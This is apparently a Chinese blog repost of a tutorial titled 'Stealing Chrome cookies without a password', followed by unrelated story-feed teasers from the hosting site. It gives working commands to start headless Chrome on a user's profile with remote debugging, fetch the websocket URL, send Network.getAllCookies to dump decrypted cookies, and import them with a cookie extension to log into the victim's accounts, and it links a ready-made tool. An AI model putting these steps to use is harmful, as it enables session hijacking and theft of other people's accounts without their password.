无需密码即可窃取 Chrome 的 Cookie

简评:如果你想窃取别人 Chrome Cookie,通常需要你输入用户的密码来完成这项工作。这篇教程介绍如何不需要密码直接获取用户的 cookie。

如果只是想要直接使用这个工具可以移步到 https://github.com/defaultnamehere/cookie_crimes,一下是原理介绍。

Cookie 工作原理?

举例,当登录 facebook 时,facebook 会为你提供一个 cookie,他存在你的电脑上。下次访问 facebook 的时候,你只需要提供这个 cookie,facebook 就可以定位你的账户信息,无需再输入密码。如果你成功的偷取了别人的 cookie 就可以访问别人的账户。

Chrome 中 Cookie 的安全性

Chrome 使用 “Chrome Safe Storage” 密码来加密他们的 Cookie。这个密码存在于用户的登录钥匙串中,因此获取 cookie 的唯一方法是通过输入密码来解锁钥匙串。

这是获取用户 cookie 的合法途径,但是现在可以绕过输入密码这个环节直接获取用户 cookie。

第一步:运行 Headless Chrome 模式

运行 Headless Chrome 模式可以不显示窗口,而是在终端上运行代码。

用户数据目录

Chrome 会将用户的 cookie,历史记录,私密信息储存在 user-data-dir 中。默认路径是 $HOME/Library/Application Support/Google/Chrome/。

启用远程调试

为了便于调试和自动化原因,Chrome 提供了远程控制功能。

开启一个 Headless Chrome 窗口,在终端上输入如下命令:

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome \
--headless \
--user-data-dir="$HOME/Library/Application Support/Google/Chrome/" \
https://gmail.com \
--remote-debugging-port=9222

设置远程调试监听 localhost:9222 (Chrome 远程调试的默认端口)。成功开启 Headless Chrome 窗口后还需要打开一个标签页来 debug 它。可以是 gmail.com ,也可以是其他。

还可以添加 --dump-dom 指令来,来输入页面的 HTML(示例中是显示 gmail.com 中的内容)。

第二步:远程调试 Headless Chrome

试试对监听端口的 /json 节点获取内容,得到如下 json 数据:

$ curl -s localhost:9222/json 

[ {
"description": "",
"devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A",
"id": "7404BF41DC4E7512E0431577BABCE18A",
"title": "about:blank",
"type": "page",
"url": "about:blank",
"webSocketDebuggerUrl": "ws://localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A"
} ]

注意这里成功获取了 webSocketDebuggerUrl。

第三步:通过 websocket 协议发出指明

通过上一步中获取的的 webSocketDebuggerUrl,我们可以使用指令来控制 Chrome 了。

先连接该 url,这里使用 wsc 来帮我们完成这部分内容。

wsc ws://localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A
Connected to ws://localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A
>

成功连上后就可以输入指令来获取想要的内容,那么如何获取所有的 cookie 信息呢,好吧我也找了很久,最后在这里找到了。

>{"id": 1, "method": "Network.getAllCookies"}
[{
"domain": "mail.google.com",
"expires": -1,
"httpOnly": false,
"name": "GMAIL_AT",
"path": "/mail/u/0",
"secure": true,
"session": true,
"size": 42,
"value": <unencrypted cookie value appears here>
},
...<the rest of the cookies>

这样 Chrome 不再要求我们输入密码,直接对 cookie 进行解密并返回。到此我们已经成功绕过密码验证获取所有 cookie 了。

你可以将这些 cookie 插入到 Chrome Extension 中 (例如:EditThisCookie),就可以直接登录 cookie 代表的账户了。


原文链接:Stealing Chrome cookies without a password
推荐阅读:隐私问题如此严重,不如卖自己的数据挣点钱?

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 161,780评论 4 369
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 68,424评论 1 305
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 111,397评论 0 254
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,576评论 0 218
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,997评论 3 295
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,945评论 1 224
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 32,107评论 2 317
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,850评论 0 208
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,625评论 1 250
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,804评论 2 253
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,285评论 1 265
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,613评论 3 261
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,291评论 3 242
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,164评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,963评论 0 201
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 36,096评论 2 285
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,886评论 2 278

推荐阅读更多精彩内容